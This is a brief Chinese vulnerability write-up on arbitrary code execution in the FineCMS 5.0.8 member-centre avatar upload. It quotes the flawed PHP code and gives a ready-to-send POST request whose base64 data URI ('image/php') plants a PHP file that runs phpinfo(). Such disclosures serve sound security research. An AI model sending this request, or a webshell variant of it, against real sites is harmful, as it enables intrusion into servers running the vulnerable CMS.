# Finecms 5.0.8 会员中心任意代码执行漏洞
======================================
一、漏洞简介
————
二、漏洞影响
————
Finecms 5.0.8
三、复现过程
————
### 漏洞分析
在文件`./controllersmemberAccount.php`中的upload函数
if (preg_match(‘/^(data:\s*image\/(\w+);base64,)/’, $file, $result)){
$new_file = $dir.’0x0.’.$result[2];
if (!@file_put_contents($new_file, base64_decode(str_replace($result[1], ”, $file)))) {
exit(dr_json(0, ‘目录权限不足或磁盘已满’));
### 漏洞复现
注册会员,登录访问:
http://www.0-sec.org:88/index.php?s=member&c=account&m=upload
POST:tx=data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+
2.png
3.png
参考链接
——–
> http://4o4notfound.org/index.php/archives/40/
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容